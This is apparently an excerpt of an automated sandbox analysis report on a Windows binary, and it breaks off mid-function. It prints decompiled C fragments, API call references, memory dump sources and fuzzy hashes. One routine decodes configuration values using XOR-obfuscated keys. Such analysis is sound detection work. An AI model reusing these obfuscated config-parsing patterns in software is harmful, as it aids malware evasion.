                                                                                                                          • Instruction ID: ff9271b879235cd9587f4047cc067c496d19ab6c0c9ff0d114d48d56b46db37a
                                                                                                                          • Opcode Fuzzy Hash: 656c7bc4374c9f09022c7a9bed8e03b1accd9087c7f46ce1c7085cd4c3b113e6
                                                                                                                          • Instruction Fuzzy Hash: 8CB012F535C001BD301812091D13D3B059FC8C8924324802FFB02D4000E843BC431031
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E04CDAB31() {
                                                                                                                          
                                                                                                                          				E04CDABF6(0x4cdc344, 0x4cdd134); // executed
                                                                                                                          				goto __eax;
                                                                                                                          			}



                                                                                                                          0x04cdab28
                                                                                                                          0x04cdab2f

                                                                                                                          APIs
                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 04CDAB28
                                                                                                                            • Part of subcall function 04CDABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 04CDAC6F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 123106877-0
                                                                                                                          • Opcode ID: 98a61ee74ab8d6513920b6cf8b8e8824308da472d4d544cbbc27e75f23f7a2b0
                                                                                                                          • Instruction ID: 0b8cad296d243b2473c5fabf4b113a34b2433180d474780ce5dd2e1c863b59e2
                                                                                                                          • Opcode Fuzzy Hash: 98a61ee74ab8d6513920b6cf8b8e8824308da472d4d544cbbc27e75f23f7a2b0
                                                                                                                          • Instruction Fuzzy Hash: 62B012E535E001BD3014520D1D12D37014FC8C8924324802FFB01C4100E8437C431131
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E04CD4AAB(void* _a4) {
                                                                                                                          				char _t2;
                                                                                                                          
                                                                                                                          				_t2 = RtlFreeHeap( *0x4cdd270, 0, _a4); // executed
                                                                                                                          				return _t2;
                                                                                                                          			}




                                                                                                                          0x04cd4ab7
                                                                                                                          0x04cd4abd

                                                                                                                          APIs
                                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000000,04CD5012,00000000,?,?,00000000), ref: 04CD4AB7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3298025750-0
                                                                                                                          • Opcode ID: e09d9ac428728181a0db46e6368e10342e8ca55bf5349f0108ba72d6f52397d3
                                                                                                                          • Instruction ID: 3006852a73d42bb3af85ab9a8eac70c7f074e7ad0f9210da2f008a360a4a01d2
                                                                                                                          • Opcode Fuzzy Hash: e09d9ac428728181a0db46e6368e10342e8ca55bf5349f0108ba72d6f52397d3
                                                                                                                          • Instruction Fuzzy Hash: 62B012B9541100BBDE215F50DF04F05BA31F750700F004012B30640074C2355C20FB15
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E04CD75F6(long _a4) {
                                                                                                                          				void* _t2;
                                                                                                                          
                                                                                                                          				_t2 = RtlAllocateHeap( *0x4cdd270, 0, _a4); // executed
                                                                                                                          				return _t2;
                                                                                                                          			}




                                                                                                                          0x04cd7602
                                                                                                                          0x04cd7608

                                                                                                                          APIs
                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,00000000,04CD4F70), ref: 04CD7602
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1279760036-0
                                                                                                                          • Opcode ID: 5e495a4f9054c0c4375c2829725fa38215ce93c1dab0977327e4f8a66fcd2111
                                                                                                                          • Instruction ID: bf6834d8f81835bcdf5e1196b276838ed73422d9654785e927547c5295c02a83
                                                                                                                          • Opcode Fuzzy Hash: 5e495a4f9054c0c4375c2829725fa38215ce93c1dab0977327e4f8a66fcd2111
                                                                                                                          • Instruction Fuzzy Hash: A2B01279441100BBDF115F10DE08F057B31F750700F014111B20540060C2355C24FB04
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E04CD4B28(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
                                                                                                                          				void* _t21;
                                                                                                                          				void* _t22;
                                                                                                                          				signed int _t24;
                                                                                                                          				intOrPtr* _t26;
                                                                                                                          				void* _t27;
                                                                                                                          
                                                                                                                          				_t26 = __edi;
                                                                                                                          				if(_a4 == 0) {
                                                                                                                          					L2:
                                                                                                                          					_t27 = E04CD63F5(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
                                                                                                                          					if(_t27 == 0) {
                                                                                                                          						_t24 = _a12 >> 1;
                                                                                                                          						if(_t24 == 0) {
                                                                                                                          							_t27 = 2;
                                                                                                                          							HeapFree( *0x4cdd270, 0, _a4);
                                                                                                                          						} else {
                                                                                                                          							_t21 = _a4;
                                                                                                                          							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
                                                                                                                          							 *_t26 = _t21;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					L6:
                                                                                                                          					return _t27;
                                                                                                                          				}
                                                                                                                          				_t22 = E04CD1E47(_a4, _a8, _a12, __edi); // executed
                                                                                                                          				_t27 = _t22;
                                                                                                                          				if(_t27 == 0) {
                                                                                                                          					goto L6;
                                                                                                                          				}
                                                                                                                          				goto L2;
                                                                                                                          			}









                                                                                                                          APIs
                                                                                                                            • Part of subcall function 04CD1E47: SysFreeString.OLEAUT32(00000000), ref: 04CD1EAA
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,73BCF710,?,00000000,?,00000000,?,04CD506B,?,004F0053,058B9370,00000000,?), ref: 04CD4B8B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Free$HeapString
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3806048269-0
                                                                                                                          • Opcode ID: 24ab9cca5c4ffaa768aa7082a7955bbc0b594f377cbaa68be1fdda7de68fc1d3
                                                                                                                          • Instruction ID: 6231faab5289161afebf6d10ed18ffaec8645e74efc1de65aa82d8cc722d552a
                                                                                                                          • Opcode Fuzzy Hash: 24ab9cca5c4ffaa768aa7082a7955bbc0b594f377cbaa68be1fdda7de68fc1d3
                                                                                                                          • Instruction Fuzzy Hash: A3011232501A59BBDF269F54CC05FEE7B66EF18790F048029FF099A520D731E960EB94
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Non-executed Functions

                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E04CD4C40(int* __ecx) {
                                                                                                                          				int _v8;
                                                                                                                          				void* _v12;
                                                                                                                          				void* _v16;
                                                                                                                          				void* __esi;
                                                                                                                          				signed int _t28;
                                                                                                                          				signed int _t33;
                                                                                                                          				signed int _t39;
                                                                                                                          				char* _t45;
                                                                                                                          				char* _t46;
                                                                                                                          				char* _t47;
                                                                                                                          				char* _t48;
                                                                                                                          				char* _t49;
                                                                                                                          				char* _t50;
                                                                                                                          				void* _t51;
                                                                                                                          				void* _t52;
                                                                                                                          				void* _t53;
                                                                                                                          				intOrPtr _t54;
                                                                                                                          				void* _t56;
                                                                                                                          				intOrPtr _t57;
                                                                                                                          				intOrPtr _t58;
                                                                                                                          				signed int _t61;
                                                                                                                          				intOrPtr _t64;
                                                                                                                          				signed int _t65;
                                                                                                                          				signed int _t70;
                                                                                                                          				void* _t72;
                                                                                                                          				void* _t73;
                                                                                                                          				signed int _t75;
                                                                                                                          				signed int _t78;
                                                                                                                          				signed int _t82;
                                                                                                                          				signed int _t86;
                                                                                                                          				signed int _t90;
                                                                                                                          				signed int _t94;
                                                                                                                          				signed int _t98;
                                                                                                                          				void* _t103;
                                                                                                                          				intOrPtr _t121;
                                                                                                                          
                                                                                                                          				_t104 = __ecx;
                                                                                                                          				_t28 =  *0x4cdd2dc; // 0x69b25f44
                                                                                                                          				if(E04CD5657( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
                                                                                                                          					 *0x4cdd310 = _v8;
                                                                                                                          				}
                                                                                                                          				_t33 =  *0x4cdd2dc; // 0x69b25f44
                                                                                                                          				if(E04CD5657( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
                                                                                                                          					_v12 = 2;
                                                                                                                          					L69:
                                                                                                                          					return _v12;
                                                                                                                          				}
                                                                                                                          				_t39 =  *0x4cdd2dc; // 0x69b25f44
                                                                                                                          				if(E04CD5657( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
                                                                                                                          					L67:
                                                                                                                          					HeapFree( *0x4cdd270, 0, _v16);
                                                                                                                          					goto L69;
                                                                                                                          				} else {
                                                                                                                          					_t103 = _v12;
                                                                                                                          					if(_t103 == 0) {
                                                                                                                          						_t45 = 0;
                                                                                                                          					} else {
                                                                                                                          						_t98 =  *0x4cdd2dc; // 0x69b25f44
                                                                                                                          						_t45 = E04CD3BB8(_t104, _t103, _t98 ^ 0x7895433b);
                                                                                                                          					}
                                                                                                                          					if(_t45 != 0) {
                                                                                                                          						_t104 =  &_v8;
                                                                                                                          						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                                                                                                                          							 *0x4cdd278 = _v8;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					if(_t103 == 0) {
                                                                                                                          						_t46 = 0;
                                                                                                                          					} else {
                                                                                                                          						_t94 =  *0x4cdd2dc; // 0x69b25f44
                                                                                                                          						_t46 = E04CD3BB8(_t104, _t103, _t94 ^ 0x219b08c7);
                                                                                                                          					}
                                                                                                                          					if(_t46 != 0) {
                                                                                                                          						_t104 =  &_v8;
                                                                                                                          						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                                                                                                                          							 *0x4cdd27c = _v8;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					if(_t103 == 0) {
                                                                                                                          						_t47 = 0;
                                                                                                                          					} else {
                                                                                                                          						_t90 =  *0x4cdd2dc; // 0x69b25f44
                                                                                                                          						_t47 = E04CD3BB8(_t104, _t103, _t90 ^ 0x31fc0661);
                                                                                                                          					}
                                                                                                                          					if(_t47 != 0) {
                                                                                                                          						_t104 =  &_v8;
                                                                                                                          						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                                                                                                                          							 *0x4cdd280 = _v8;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					if(_t103 == 0) {
                                                                                                                          						_t48 = 0;
                                                                                                                          					} else {
                                                                                                                          						_t86 =  *0x4cdd2dc; // 0x69b25f44
                                                                                                                          						_t48 = E04CD3BB8(_t104, _t103, _t86 ^ 0x0cd926ce);
                                                                                                                          					}
                                                                                                                          					if(_t48 != 0) {
                                                                                                                          						_t104 =  &_v8;
                                                                                                                          						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
                                                                                                                          							 *0x4cdd004 = _v8;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					if(_t103 == 0) {
                                                                                                                          						_t49 = 0;
                                                                                                                          					} else {
                                                                                                                          						_t82 =  *0x4cdd2dc; // 0x69b25f44
                                                                                                                          						_t49 = E04CD3BB8(_t104, _t103, _t82 ^ 0x3cd8b2cb);
                                                                                                                          					}
                                                                                                                          					if(_t49 != 0) {
                                                                                                                          						_t104 =  &_v8;
                                                                                                                          						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
                                                                                                                          							 *0x4cdd02c = _v8;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					if(_t103 == 0) {
                                                                                                                          						_t50 = 0;
                                                                                                                          					} else {
                                                                                                                          						_t78 =  *0x4cdd2dc; // 0x69b25f44
                                                                                                                          						_t50 = E04CD3BB8(_t104, _t103, _t78 ^ 0x2878b929);
                                                                                                                          					}
                                                                                                                          					if(_t50 == 0) {
                                                                                                                          						L41:
                                                                                                                          						 *0x4cdd284 = 5;
                                                                                                                          						goto L42;
                                                                                                                          					} else {
                                                                                                                          						_t104 =  &_v8;
                                                                                                                          						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
                                                                                                                          							goto L41;
                                                                                                                          						} else {
                                                                                                                          							L42:
                                                                                                                          							if(_t103 == 0) {
                                                                                                                          								_t51 = 0;
                                                                                                                          							} else {
                                                                                                                          								_t75 =  *0x4cdd2dc; // 0x69b25f44
                                                                                                                          								_t51 = E04CD3BB8(_t104, _t103, _t75 ^ 0x261a367a);
                                                                                                                          							}
                                                                                                                          							if(_t51 != 0) {
                                                                                                                          								_push(_t51);
                                                                                                                          								_t72 = 0x10;
                                                                                                                          								_t73 = E04CD49B8(_t72);
                                                                                                                          								if(_t73 != 0) {
                                                                                                                          									_push(_t73);
                                                                                                                          									E04CD4B98();
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							if(_t103 == 0) {
                                                                                                                          								_t52 = 0;
                                                                                                                          							} else {
                                                                                                                          								_t70 =  *0x4cdd2dc; // 0x69b25f44
                                                                                                                          								_t52 = E04CD3BB8(_t104, _t103, _t70 ^ 0xb9d404b2);
                                                                                                                          							}
                                                                                                                          							if(_t52 != 0 && E04CD49B8(0, _t52) != 0) {
                                                                                                                          								_t121 =  *0x4cdd364; // 0x58b95b0
                                                                                                                          								E04CD9311(_t121 + 4, _t68);
                                                                                                                          							}
                                                                                                                          							if(_t103 == 0) {
                                                                                                                          								_t53 = 0;
                                                                                                                          							} else {
                                                                                                                          								_t65 =  *0x4cdd2dc; // 0x69b25f44
                                                                                                                          								_t53 = E04CD3BB8(_t104, _t103, _t65 ^ 0x3df17130);
                                                                                                                          							}
                                                                                                                          							if(_t53 == 0) {
                                                                                                                          								L59:
                                                                                                                          								_t54 =  *0x4cdd2e0; // 0xbda5a8
                                                                                                                          								_t22 = _t54 + 0x4cde252; // 0x616d692f
                                                                                                                          								 *0x4cdd30c = _t22;
                                                                                                                          								goto L60;
                                                                                                                          							} else {
                                                                                                                          								_t64 = E04CD49B8(0, _t53);
                                                                                                                          								 *0x4cdd30c = _t64;
                                                                                                                          								if(_t64 != 0) {
                                                                                                                          									L60:
                                                                                                                          									if(_t103 == 0) {
                                                                                                                          										_t56 = 0;
                                                                                                                          									} else {
                                                                                                                          										_t61 =  *0x4cdd2dc; // 0x69b25f44
                                                                                                                          										_t56 = E04CD3BB8(_t104, _t103, _t61 ^ 0xd2079859);
                                                                                                                          									}
                                                                                                                          									if(_t56 == 0) {
                                                                                                                          										_t57 =  *0x4cdd2e0; // 0xbda5a8
                                                                                                                          										_t23 = _t57 + 0x4cde79a; // 0x6976612e
                                                                                                                          										_t58 = _t23;
                                                                                                                          									} else {
                                                                                                                          										_t58 = E04CD49B8(0, _t56);
                                                                                                                          									}
                                                                                                                          									 *0x4cdd380 = _t58;
                                                                                                                          									HeapFree( *0x4cdd270, 0, _t103);
                                                                                                                          									_v12 = 0;
                                                                                                                          									goto L67;
                                                                                                                          								}
                                                                                                                          								goto L59;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}






































                                                                                                                          0x04cd4d8b
                                                                                                                          0x04cd4da1
                                                                                                                          0x04cd4d8d
                                                                                                                          0x04cd4d8d
                                                                                                                          0x04cd4d9a
                                                                                                                          0x04cd4d9a
                                                                                                                          0x04cd4da5
                                                                                                                          0x04cd4da7
                                                                                                                          0x04cd4db1
                                                                                                                          0x04cd4db6
                                                                                                                          0x04cd4db6
                                                                                                                          0x04cd4db1
                                                                                                                          0x04cd4dbd
                                                                                                                          0x04cd4dd3
                                                                                                                          0x04cd4dbf
                                                                                                                          0x04cd4dbf
                                                                                                                          0x04cd4dcc
                                                                                                                          0x04cd4dcc
                                                                                                                          0x04cd4dd7
                                                                                                                          0x04cd4dea
                                                                                                                          0x04cd4dea
                                                                                                                          0x00000000
                                                                                                                          0x04cd4dd9
                                                                                                                          0x04cd4dd9
                                                                                                                          0x04cd4de3
                                                                                                                          0x00000000
                                                                                                                          0x04cd4df4
                                                                                                                          0x04cd4df4
                                                                                                                          0x04cd4df6
                                                                                                                          0x04cd4e0c
                                                                                                                          0x04cd4df8
                                                                                                                          0x04cd4df8
                                                                                                                          0x04cd4e05
                                                                                                                          0x04cd4e05
                                                                                                                          0x04cd4e10
                                                                                                                          0x04cd4e12
                                                                                                                          0x04cd4e15
                                                                                                                          0x04cd4e16
                                                                                                                          0x04cd4e1d
                                                                                                                          0x04cd4e1f
                                                                                                                          0x04cd4e20
                                                                                                                          0x04cd4e20
                                                                                                                          0x04cd4e1d
                                                                                                                          0x04cd4e27
                                                                                                                          0x04cd4e3d
                                                                                                                          0x04cd4e29
                                                                                                                          0x04cd4e29
                                                                                                                          0x04cd4e36
                                                                                                                          0x04cd4e36
                                                                                                                          0x04cd4e41
                                                                                                                          0x04cd4e4f
                                                                                                                          0x04cd4e59
                                                                                                                          0x04cd4e59
                                                                                                                          0x04cd4e60
                                                                                                                          0x04cd4e76
                                                                                                                          0x04cd4e62
                                                                                                                          0x04cd4e62
                                                                                                                          0x04cd4e6f
                                                                                                                          0x04cd4e6f
                                                                                                                          0x04cd4e7a
                                                                                                                          0x04cd4e8d
                                                                                                                          0x04cd4e8d
                                                                                                                          0x04cd4e92
                                                                                                                          0x04cd4e98
                                                                                                                          0x00000000
                                                                                                                          0x04cd4e7c
                                                                                                                          0x04cd4e7f
                                                                                                                          0x04cd4e84
                                                                                                                          0x04cd4e8b
                                                                                                                          0x04cd4e9d
                                                                                                                          0x04cd4e9f
                                                                                                                          0x04cd4eb5
                                                                                                                          0x04cd4ea1
                                                                                                                          0x04cd4ea1
                                                                                                                          0x04cd4eae
                                                                                                                          0x04cd4eae
                                                                                                                          0x04cd4eb9
                                                                                                                          0x04cd4ec5
                                                                                                                          0x04cd4eca
                                                                                                                          0x04cd4eca
                                                                                                                          0x04cd4ebb
                                                                                                                          0x04cd4ebe
                                                                                                                          0x04cd4ebe
                                                                                                                          0x04cd4ed8
                                                                                                                          0x04cd4edd
                                                                                                                          0x04cd4ee3
                                                                                                                          0x00000000
                                                                                                                          0x04cd4ee3
                                                                                                                          0x00000000
                                                                                                                          0x04cd4e8b
                                                                                                                          0x04cd4e7a
                                                                                                                          0x04cd4de3
                                                                                                                          0x04cd4dd7

                                                                                                                          APIs
                                                                                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04CD5390,?,69B25F44,?,04CD5390,69B25F44,?,04CD5390,69B25F44,00000005,04CDD00C,00000008), ref: 04CD4CE5
                                                                                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04CD5390,?,69B25F44,?,04CD5390,69B25F44,?,04CD5390,69B25F44,00000005,04CDD00C,00000008), ref: 04CD4D17
                                                                                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04CD5390,?,69B25F44,?,04CD5390,69B25F44,?,04CD5390,69B25F44,00000005,04CDD00C,00000008), ref: 04CD4D49
                                                                                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04CD5390,?,69B25F44,?,04CD5390,69B25F44,?,04CD5390,69B25F44,00000005,04CDD00C,00000008), ref: 04CD4D7B
                                                                                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04CD5390,?,69B25F44,?,04CD5390,69B25F44,?,04CD5390,69B25F44,00000005,04CDD00C,00000008), ref: 04CD4DAD
                                                                                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04CD5390,?,69B25F44,?,04CD5390,69B25F44,?,04CD5390,69B25F44,00000005,04CDD00C,00000008), ref: 04CD4DDF
                                                                                                                          • HeapFree.KERNEL32(00000000,04CD5390,04CD5390,?,69B25F44,?,04CD5390,69B25F44,?,04CD5390,69B25F44,00000005,04CDD00C,00000008,?,04CD5390), ref: 04CD4EDD
                                                                                                                          • HeapFree.KERNEL32(00000000,?,04CD5390,?,69B25F44,?,04CD5390,69B25F44,?,04CD5390,69B25F44,00000005,04CDD00C,00000008,?,04CD5390), ref: 04CD4EF0
                                                                                                                            • Part of subcall function 04CD49B8: lstrlen.KERNEL32(69B25F44,00000000,7656D3B0,04CD5390,04CD4EC3,00000000,04CD5390,?,69B25F44,?,04CD5390,69B25F44,?,04CD5390,69B25F44,00000005), ref: 04CD49C1
                                                                                                                            • Part of subcall function 04CD49B8: memcpy.NTDLL(00000000,?,00000000,00000001,?,04CD5390), ref: 04CD49E4
                                                                                                                            • Part of subcall function 04CD49B8: memset.NTDLL ref: 04CD49F3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeHeap$lstrlenmemcpymemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3442150357-0
                                                                                                                          • Opcode ID: 9e62ce5e25eb72a7065a2f820368e5ced95f7af525deb1e59d756470082bcbe2
                                                                                                                          • Instruction ID: ddd5b435ca30669ce38551a06165d9fc2a4a557c97a676fa500022c26bcf3287
                                                                                                                          • Opcode Fuzzy Hash: 9e62ce5e25eb72a7065a2f820368e5ced95f7af525deb1e59d756470082bcbe2
                                                                                                                          • Instruction Fuzzy Hash: C6818374A01644BEDB14EFB4CE84D6BB7FBEB487007284965A703D7104EA35FE409B64
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,j3n,00000002,00000000,?,?,?,6E33EB6A,?,00000000), ref: 6E33E8E5
                                                                                                                          • GetLocaleInfoW.KERNEL32(?,20001004,j3n,00000002,00000000,?,?,?,6E33EB6A,?,00000000), ref: 6E33E90E
                                                                                                                          • GetACP.KERNEL32(?,?,6E33EB6A,?,00000000), ref: 6E33E923
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: InfoLocale
                                                                                                                          • String ID: ACP$OCP$j3n
                                                                                                                          • API String ID: 2299586839-873717512
                                                                                                                          • Opcode ID: 7d1e1cd62d4062a7df91a4d735e80c6ac72ab922e6a5d314a8c008c26ee852c3
                                                                                                                          • Instruction ID: dd5cc24ca46b0ec31309cf6b682a2c846e1443720e4c8b4881d6f976a33c679b
                                                                                                                          • Opcode Fuzzy Hash: 7d1e1cd62d4062a7df91a4d735e80c6ac72ab922e6a5d314a8c008c26ee852c3
                                                                                                                          • Instruction Fuzzy Hash: 5821E226E043A5EAE7A48BEBC901F9B77ABAF45F50B628420E905DF504E733DD40C390
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E32F299: GetLastError.KERNEL32(00000000,00000000,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000,00000004), ref: 6E32F29E
                                                                                                                            • Part of subcall function 6E32F299: SetLastError.KERNEL32(00000000,6E37A1A0,000000FF,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000), ref: 6E32F33C
                                                                                                                          • GetACP.KERNEL32(?,?,?,?,?,?,6E3325B5,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 6E33E163
                                                                                                                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6E3325B5,?,?,?,00000055,?,-00000050,?,?), ref: 6E33E18E
                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 6E33E222
                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 6E33E230
                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6E33E2F1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4147378913-0
                                                                                                                          • Opcode ID: 90e1432405cd92aa9c9e7d0a5b6c36d61da55a424b733a30f54be4847cb0fe27
                                                                                                                          • Instruction ID: d4111a5a416444278168e6b8cfc21d73982251dc2f7ef529f70c44144017b726
                                                                                                                          • Opcode Fuzzy Hash: 90e1432405cd92aa9c9e7d0a5b6c36d61da55a424b733a30f54be4847cb0fe27
                                                                                                                          • Instruction Fuzzy Hash: 66711871A00362AAEB65ABF6CC45FA773ACEF45314F30082AE555DB180EB71EC408B61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E32F299: GetLastError.KERNEL32(00000000,00000000,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000,00000004), ref: 6E32F29E
                                                                                                                            • Part of subcall function 6E32F299: SetLastError.KERNEL32(00000000,6E37A1A0,000000FF,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000), ref: 6E32F33C
                                                                                                                            • Part of subcall function 6E32F299: _free.LIBCMT ref: 6E32F2FB
                                                                                                                            • Part of subcall function 6E32F299: _free.LIBCMT ref: 6E32F331
                                                                                                                          • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 6E33EB2D
                                                                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 6E33EB76
                                                                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 6E33EB85
                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6E33EBCD
                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6E33EBEC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 949163717-0
                                                                                                                          • Opcode ID: 5b9609fdfdb29309dda328721904905794aa73cbe5b363baa38e552c1537ebe1
                                                                                                                          • Instruction ID: afe904202404c1a6e8cf5ed636a877968029fcc17d3d7c6afc9698b2e0a81371
                                                                                                                          • Opcode Fuzzy Hash: 5b9609fdfdb29309dda328721904905794aa73cbe5b363baa38e552c1537ebe1
                                                                                                                          • Instruction Fuzzy Hash: D7516E72A0436A9AEF51DFE6CC44EAE77BCBF05700F24046AE551EB180DB719D40CB61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 68%
                                                                                                                          			E04CD4A03() {
                                                                                                                          				char _v264;
                                                                                                                          				void* _v300;
                                                                                                                          				int _t8;
                                                                                                                          				intOrPtr _t9;
                                                                                                                          				int _t15;
                                                                                                                          				void* _t17;
                                                                                                                          
                                                                                                                          				_t15 = 0;
